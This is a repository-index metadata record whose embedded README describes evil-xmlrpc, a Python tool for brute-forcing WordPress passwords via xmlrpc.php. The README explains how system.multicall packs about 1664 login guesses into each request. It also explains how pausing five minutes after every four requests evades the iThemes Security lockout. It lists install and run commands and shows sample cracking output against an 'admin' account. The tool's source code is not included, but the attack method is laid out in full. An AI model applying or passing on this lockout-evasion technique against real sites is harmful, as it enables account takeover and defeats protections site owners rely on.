{"id":14638152,"url":"https://github.com/0xapt/evil-xmlrpc","last_synced_at":"2025-09-07T06:32:46.525Z","repository":{"id":107032491,"uuid":"487003204","full_name":"Subn0x/evil-xmlrpc","owner":"Subn0x","description":"evil-xmlrpc is a tool that I created to help me bruteforce Wordpress user accounts using xmlrpc.php while bypassing iThemes Security preventing lockouts","archived":false,"fork":false,"pushed_at":"2022-05-03T12:57:43.000Z","size":26,"stargazers_count":6,"open_issues_count":0,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-07-30T14:18:29.212Z","etag":null,"topics":["exploit","ithemes-security","python","wordpress"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Subn0x.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-04-29T14:31:02.000Z","updated_at":"2024-07-30T14:18:29.213Z","dependencies_parsed_at":"2024-01-14T12:45:27.464Z","dependency_job_id":"7f7ffc8d-273f-4788-9174-5277847450aa","html_url":"https://github.com/Subn0x/evil-xmlrpc","commit_stats":null,"previous_names":["subn0x/evil-xmlrpc","0xapt/evil-xmlrpc"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Subn0x%2Fevil-xmlrpc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Subn0x%2Fevil-xmlrpc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Subn0x%2Fevil-xmlrpc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Subn0x%2Fevil-xmlrpc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Subn0x","download_url":"https://codeload.github.com/Subn0x/evil-xmlrpc/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":232183075,"owners_count":18484730,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","ithemes-security","python","wordpress"],"created_at":"2024-09-10T02:01:45.303Z","updated_at":"2025-01-02T10:31:38.469Z","avatar_url":"https://github.com/Subn0x.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# evil-xmlrpc\nevil-xmlrpc is a tool that I created to help me brute-force WordPress user accounts via xmlrpc.php while avoiding the lockouts imposed by the iThemes Security plugin.\n\nWhile testing a specific target I noticed that xmlrpc was enabled, but after sending a few requests against a discovered user account I was locked out of the site. After waiting until the lockout period ended, I saw that the iThemes Security plugin was in use on the site. I soon noticed that I was completely locked out after sending 5 requests. Regular brute-force methods, which involve sending only a single username and password per request, were not going to work here. Later I discovered that many login attempts can be sent in one single request using \"system.multicall\". In my particular situation I found that I could only send 1666 login attempts per request at a time (this may differ for your target). So I wrote this script to take a password list (of about 1 million words) and send it off in groups of 1664 (initially 1666 in the script, but cut back by 2 for breathing room).\n\nFor example:\n* Request 1 (sends lines 1-1666 of the wordlist)\n* Request 2 (sends lines 1667-3332 of the wordlist)\n* Request 3 (sends lines 3333-4998 of the wordlist)\n* Request 4 (sends lines 4999-6664 of the wordlist)\n\nBefore sending the 5th request, stop for 5 minutes to avoid being locked out of the site, then continue going down the list.\n\n## Install\n\n```sh\ngit clone https://github.com/0xApt/evil-xmlrpc.git\ncd evil-xmlrpc\npip3 install -r requirements.txt\npython3 evil-xmlrpc.py \u003cpasswordlist\u003e \u003cusername\u003e \u003chttps://www.examplesite.com\u003e\n```\n\n## Demo output\n\n```sh\n\nroot@user:~ python3 evil-xmlrpc.py 100000-pass-wordlist.txt admin https://www.examplesite.com\n\n                 ██  ▀██                        ▀██\n  ▄▄▄▄  ▄▄▄▄ ▄▄▄ ▄▄▄   ██     ▄▄▄ ▄▄▄ ▄▄ ▄▄ ▄▄    ██  ▄▄▄ ▄▄  ▄▄▄ ▄▄▄    ▄▄▄▄\n▄█▄▄▄██  ▀█▄  █   ██   ██      ▀█▄▄▀   ██ ██ ██   ██   ██▀ ▀▀  ██▀  ██ ▄█   ▀▀\n██        ▀█▄█    ██   ██       ▄█▄    ██ ██ ██   ██   ██      ██    █ ██\n ▀█▄▄▄▀    ▀█    ▄██▄ ▄██▄    ▄█  ██▄ ▄██ ██ ██▄ ▄██▄ ▄██▄     ██▄▄▄▀   ▀█▄▄▄▀\n                                                               ██\n                                                              ▀▀▀▀\n                                By 0xapt\n\n[*] Checking if site is vulnerable..\n[*] Site is vulnerable!\n[*] File has 100000 lines\n\n[*] Sending Payload.. \n[*] Attempt: 1 \n[*] Target User: admin\n[*] Using lines 0 to 1664 from password list\n[*] Content Length: 356283\n[*] Interesting.. Saving response..\n[*] Password Not Cracked.\n\n[*] Sending Payload.. \n[*] Attempt: 2 \n[*] Target User: admin\n[*] Using lines 1665 to 3328 from password list\n[*] Content Length: 356069\n[*] Password Not Cracked.\n\n[*] Sending Payload.. \n[*] Attempt: 3 \n[*] Target User: admin\n[*] Using lines 3329 to 4992 from password list\n[*] Content Length: 356069\n[*] Password Not Cracked.\n\n[*] Sending Payload.. \n[*] Attempt: 4 \n[*] Target User: admin\n[*] Using lines 4993 to 6656 from password list\n[*] Content Length: 356069\n[*] Password Not Cracked.\n\n[*] Waiting 5 mins to prevent lockout...\n[*] Till next requests: 3:24\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xapt%2Fevil-xmlrpc","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xapt%2Fevil-xmlrpc","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xapt%2Fevil-xmlrpc/lists"}